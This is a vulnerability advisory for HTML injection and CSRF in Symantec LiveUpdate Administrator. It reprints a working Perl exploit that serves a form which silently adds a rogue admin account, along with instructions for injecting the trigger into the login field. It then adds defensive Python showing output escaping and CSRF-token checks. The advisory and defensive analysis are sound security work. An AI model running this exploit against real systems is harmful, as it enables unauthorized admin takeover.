Symantec LiveUpdate Administrator HTML Injection Vulnerability - Vulnerability Alert - myhack58 (黑吧安全网)

2011-03-24T00:00:00
ID MYHACK58:62201129839
Type myhack58
Reporter Anonymous
Modified 2011-03-24T00:00:00

Description

Symantec LiveUpdate is Symantec's technology for automatically updating Symantec virus definitions and products. The LiveUpdate client is installed automatically with every Symantec product. LiveUpdate periodically connects to a LiveUpdate server to check for new updates for the Symantec products installed on the computer. The Symantec LiveUpdate Administrator web pages contain an HTML injection vulnerability: input is written back into pages without encoding, which can lead to cross-site scripting attacks or to malicious HTML being embedded in the management interface.

[+] info:
~~~~~~~~~
Symantec LiveUpdate Administrator Management GUI HTML Injection

[+] poc:
~~~~~~~~~

```perl
#!/usr/bin/perl
#
##
# Title: Symantec Live Update Administrator CSRF Exploit
# Name: luaCSRF.pl
# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#
# Use it only for education or ethical pentesting! The author accepts
# no liability for damage caused by this tool.
#
##

use Socket;
use IO::Handle;
use Getopt::Std;

# Note: usage() lists a -p option, but only -g and -h are parsed; the
# listener below is fixed on port 80.
my %args;
getopt('g:h:', \%args);

my $payload = $args{g} || usage();
my $victim  = $args{h} || usage();

banner();

if ($payload eq "1") {
    print "[+] Using the Alert Box payload\n";
    # Alert Box
    $html = <<ENDHTML;
<html>
<SCRIPT LANGUAGE="JavaScript">alert('!!! XSS/CSRF vulnerability!!!')</SCRIPT>
</html>

ENDHTML

} elsif ($payload eq "2") {
    print "[+] Using the add admin user payload\n";
    # Adds the user CSRFpwn with password 12345678
    # ("\@" keeps the address literal; an unescaped @junk would interpolate as an array)
    $html = <<ENDHTML;
<html>
<body onload="document.csrf.submit();">
<form name="csrf" action="http://$victim:7070/lua/adduser.do" method="post">
<input type="hidden" name="dispatch" value="save" />
<input type="hidden" name="username" value="CSRFpwn" />
<input type="hidden" name="password" value="12345678" />
<input type="hidden" name="verifyPassword" value="12345678" />
<input type="hidden" name="lastname" value="junk" />
<input type="hidden" name="firstname" value="junk" />
<input type="hidden" name="email" value="junk\@junk.com" />
<input type="hidden" name="userRole" value="1" />
</form>
</body>
</html>

ENDHTML

}

my $protocol = getprotobyname('tcp');

socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "[-] socket() failed: $!";
setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, 1) or die "[-] Can't set SO_REUSEADDR: $!";
my $my_addr = sockaddr_in(80, INADDR_ANY);
bind(SOCK, $my_addr) or die "[-] bind() failed: $!";
listen(SOCK, SOMAXCONN) or die "[-] listen() failed: $!";
warn "[+] waiting for incoming connections on port 80...\n";
warn "[+] Enter the following String in the LUA username login field\n";
warn "[+] (e.g. HTTP/SSH) and wait for the admin to view the Logs\n";
warn "[+]\n";
warn "[+] <frame src=http://<LOCAL_ADDRESS>/.html>\n";

$repeat = 1;
$victim = inet_aton("0.0.0.0");   # reconstructed: the function name was garbled in extraction
while ($repeat) {
    my $remote_addr = accept(SESSION, SOCK);
    my ($port, $hisaddr) = sockaddr_in($remote_addr);
    warn "[+] Connection from [", inet_ntoa($hisaddr), ":$port]\n";
    $victim = $hisaddr;
    SESSION->autoflush(1);
    if (<SESSION>) {
        # $http_header is never assigned in the published script, so it
        # concatenates as an empty string and only $html is written back.
        print SESSION $http_header . $html;
    }
    warn "[+] Connection from [", inet_ntoa($hisaddr), ":$port] finished\n";
    close SESSION;
}

sub usage {
    print $payload;
    print "\n";
    print " luaCSRF.pl - Symantec LUA CSRF Exploit\n";
    print "===============================================================\n\n";
    print " Usage:\n";
    print " $0 -g <payload> -h <lua-ip>\n";
    print " Optional:\n";
    print " -p <local port to listen on>\n";
    print " -g (1/2) <payload to use>\n";
    print " 1 <Execute an alert box>\n";
    print " 2 <Add the Admin User \"CSRFpwn\">\n";
    print " Notes:\n";
    print " -nothing here\n";
    print "\n";
    print " Author:\n";
    print " Nikolas Sotiriu (lofi)\n";
    print " url: www.sotiriu.de\n";
    print " mail: lofi[at]sotiriu.de\n";
    print "\n";

    exit(1);
}

sub banner {
    # The ASCII-art logo that followed the title lines was reduced to a grid
    # of 0s and 1s by extraction and is omitted here.
    print STDERR <<"EOF";
--------------------------------------------------------------------------------
 luaCSRF.pl - Symantec LUA CSRF Exploit
--------------------------------------------------------------------------------

EOF
}
```
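The PoC chains two weaknesses: a log page that writes the login username back into HTML unencoded, and a state-changing action (adding a user) that accepts any POST carrying the admin's session cookie. The following Python is an added example written for this page, not Symantec's code and not the PoC author's; it shows the vulnerable rendering pattern beside its encoded form, and a hypothetical add-user handler that rejects requests lacking a session-bound CSRF token. The log records, the `handle_add_user` function and the `csrf_token` field name are constructed for illustration; 203.0.113.5 is a documentation address.

```python
import hmac
import html
import secrets
from typing import Dict, Optional, Tuple

# Constructed sample records (not real LUA log output): failed-login entries
# whose "user" field is whatever was typed into the login form, so it is
# attacker-controlled. The second entry carries a frame tag of the kind the
# PoC above tells the tester to enter; 203.0.113.5 is a documentation address.
SAMPLE_LOG = [
    {"user": "alice", "result": "login failed"},
    {"user": "<frame src=http://203.0.113.5/.html>", "result": "login failed"},
]


def render_log_row_unsafe(entry: Dict[str, str]) -> str:
    """Vulnerable pattern: the untrusted username is concatenated into HTML as-is,
    so any tag it contains becomes live markup when an admin views the log."""
    return f"<tr><td>{entry['user']}</td><td>{entry['result']}</td></tr>"


def render_log_row_safe(entry: Dict[str, str]) -> str:
    """Hardened pattern: every untrusted value is HTML-escaped for the element
    context before it is written into the page."""
    user = html.escape(entry["user"], quote=True)
    result = html.escape(entry["result"], quote=True)
    return f"<tr><td>{user}</td><td>{result}</td></tr>"


def markup_survived(rendered: str, untrusted: str) -> bool:
    """Review/test helper: True if the raw untrusted string still appears
    verbatim in the rendered HTML, i.e. it was not encoded."""
    return untrusted in rendered


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Bind a fresh random token to the server-side session. The genuine form
    embeds it as a hidden field; a cross-origin auto-submitting form cannot
    read it, so its POST arrives without a valid token."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def handle_add_user(session: Dict[str, str], form: Dict[str, str]) -> Tuple[int, Optional[str]]:
    """Hypothetical add-user handler (not LUA's actual adduser.do). It refuses
    the request unless the submitted token matches the session's token, using a
    constant-time comparison; only then does it validate the rest of the form.
    Returns (HTTP status, created username or None)."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return 403, None
    if not form.get("username") or form.get("password") != form.get("verifyPassword"):
        return 400, None
    return 200, form["username"]


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print("unsafe:", render_log_row_unsafe(entry))
        print("safe:  ", render_log_row_safe(entry))
    session: Dict[str, str] = {}
    token = issue_csrf_token(session)
    # Constructed request mirroring the PoC's hidden form; the forged copy has no token.
    forged = {"dispatch": "save", "username": "CSRFpwn",
              "password": "12345678", "verifyPassword": "12345678", "userRole": "1"}
    print("forged request:    ", handle_add_user(session, forged))
    print("legitimate request:", handle_add_user(session, {**forged, "csrf_token": token}))
```

The encoding must match the output context: `html.escape` is correct for text between tags and for quoted attribute values, while a value placed inside a script block or a URL needs a different encoder. The token check is independent of the encoding fix; either weakness alone leaves the other exploitable, which is why the PoC needs both.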

[+] Reference:
~~~~~~~~~
http://www.securityfocus.com/bid/46856/info